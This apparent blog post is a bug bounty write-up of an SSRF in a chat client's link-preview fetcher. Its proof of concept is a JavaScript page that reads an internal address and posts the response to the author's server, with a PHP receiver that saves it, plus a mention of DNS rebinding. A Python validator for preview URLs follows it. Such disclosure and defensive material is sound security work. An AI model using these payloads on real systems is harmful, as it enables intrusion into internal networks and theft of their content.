[bugbounty] A Simple SSRF


I was working on a private program that I cannot disclose.
Its web assets span several subdomains. After testing those for a while, I decided to look at the Mac client.
The Mac client has a chat interface, and that is where I found an SSRF.

The whole process follows.

After installing the client and signing up, I was presented with a chat interface.
Sending a URL in the chat produces a preview of it: the client fetches the URL and returns its title and favicon.
I tested with my own server's IP as the URL and received a request whose User-Agent header was a browser's.
Then I tested http://127.0.0.1, https://127.0.0.1, file://etc/passwd and so on, along with many common internal IP ranges.
None of them had any effect.
Next I tried subdomain brute-forcing, as well as some asset-discovery sites, to find internal IPs, until one IP returned a preview. That seemed to be a successful hit.
I quickly submitted the vulnerability. But, as noted above, this only retrieves a very small amount of content (a title and favicon).
After more testing, I found that the preview fetcher also executes JavaScript, which fits its browser User-Agent.
<html><p id='d1'></p>
<script>
    // Synchronous GET issued from whatever context the preview fetcher renders this page in
    function get(url) {
        try {
            var req = new XMLHttpRequest();
            req.open('GET', url, false);
            req.send(null);
            if (req.status == 200)
                return req.responseText;
        } catch (err) {
            // cross-origin or network failure: fall through and return null
        }
        return null;
    }
    // If the request was not blocked, the preview shows the length of the response
    var role = get('https://google.com');
    document.getElementById("d1").innerHTML = role === null ? 'blocked' : role.length;
</script></html>

The page successfully displays the length of the content Google returned,
so the request does not seem to be blocked by the Same-Origin Policy.
That means we can retrieve any internal network content.
PoC
xxx.php (on my own server, receives the exfiltrated content):
<?php
// Append each received body to save.txt, one entry per line
file_put_contents("save.txt", $_POST['cc'] . "\n", FILE_APPEND);
?>
poc.html (the page sent as the chat URL):
<html><p id='d1'></p>
<script>
// Synchronous GET of the target; returns null if blocked or on error
function get(url) {
    try {
        var req = new XMLHttpRequest();
        req.open('GET', url, false);
        req.send(null);
        if (req.status == 200)
            return req.responseText;
    } catch (err) {
        // cross-origin or network failure: fall through and return null
    }
    return null;
}
// Send the fetched body back to my server as a form field named "cc"
function post(url, content) {
    var req = new XMLHttpRequest();
    req.open("POST", url, true);
    var formData = new FormData();
    formData.append("cc", content);
    req.send(formData);
}
var role = get('https://Internal ip');
// URL-encode the body so it survives the form post; decode it on the server side
post('https://xxxxxxxxxxx.com/xxx.php', escape(role));
document.getElementById("d1").innerHTML = role === null ? 'blocked' : role.length;
</script></html>
Then check save.txt (the Burp Collaborator client also works as the receiver).
After URL-decoding the saved value, the full response is visible.

We are successful in getting the full content of any address on the internal network.
If the Same-Origin Policy does block the request, it can be bypassed with DNS rebinding to retrieve the internal server's content.
Details are at https://github.com/mpgn/ByP-SOP.
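As an added defender's example (not part of the original write-up, and not the program's own code), here is the validation a URL-preview fetcher should run before following a user-supplied link: an http(s)-only scheme allowlist, resolution of the hostname, rejection of loopback, private, link-local and IPv4-mapped addresses across every DNS answer, and pinning of the resolved IP so a later DNS answer (the rebinding trick referenced above) cannot redirect the connection. The names check_preview_url, fake_resolver and CONSTRUCTED_DNS are mine, and the DNS table is constructed so the example runs offline.

```python
import ipaddress
import socket
from urllib.parse import urlsplit

ALLOWED_SCHEMES = {"http", "https"}

# Constructed DNS table so the example runs offline; a real fetcher uses system_resolver.
CONSTRUCTED_DNS = {
    "example.com": ["93.184.216.34"],
    "rebind.test": ["93.184.216.34", "10.0.0.5"],  # one public and one internal answer
}

def fake_resolver(host):
    if host not in CONSTRUCTED_DNS:
        raise socket.gaierror("no constructed entry for %s" % host)
    return CONSTRUCTED_DNS[host]

def system_resolver(host):
    # Every A/AAAA answer, not just the first: all of them must be public.
    return sorted({info[4][0] for info in socket.getaddrinfo(host, None)})

def is_public(addr):
    # Unwrap IPv4-mapped IPv6 (::ffff:10.0.0.1) so the IPv4 range checks apply.
    if isinstance(addr, ipaddress.IPv6Address) and addr.ipv4_mapped is not None:
        addr = addr.ipv4_mapped
    return not (addr.is_private or addr.is_loopback or addr.is_link_local
                or addr.is_multicast or addr.is_reserved or addr.is_unspecified)

def check_preview_url(url, resolver=system_resolver):
    """Return (allowed, reason, pinned_ip). The fetcher must connect to pinned_ip
    (keeping the original Host header) instead of resolving the name again."""
    parts = urlsplit(url)
    if parts.scheme not in ALLOWED_SCHEMES:
        return False, "scheme %r not allowed" % parts.scheme, None
    host = parts.hostname
    if not host:
        return False, "missing host", None
    try:
        addrs = [ipaddress.ip_address(host)]  # literal IP in the URL
    except ValueError:
        try:
            addrs = [ipaddress.ip_address(a) for a in resolver(host)]
        except (socket.gaierror, ValueError):
            return False, "unresolvable host", None
    for addr in addrs:
        if not is_public(addr):
            return False, "resolves to non-public address %s" % addr, None
    return True, "ok", str(addrs[0])
```

A real fetcher also has to re-run this check on every redirect hop and render the preview without executing JavaScript, since script execution is what turned the title-only leak above into full content retrieval.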
Finally, I got the highest bounty reward for this private program.

Comments

  1. You find an internal IP and then you put it in the chat?

    Replies
    1. Not really. When he sent a URL via chat, the chat rendered a preview of the sent URL; because of that, it was possible to enumerate internal IPs by obtaining the title of the web page on that host.

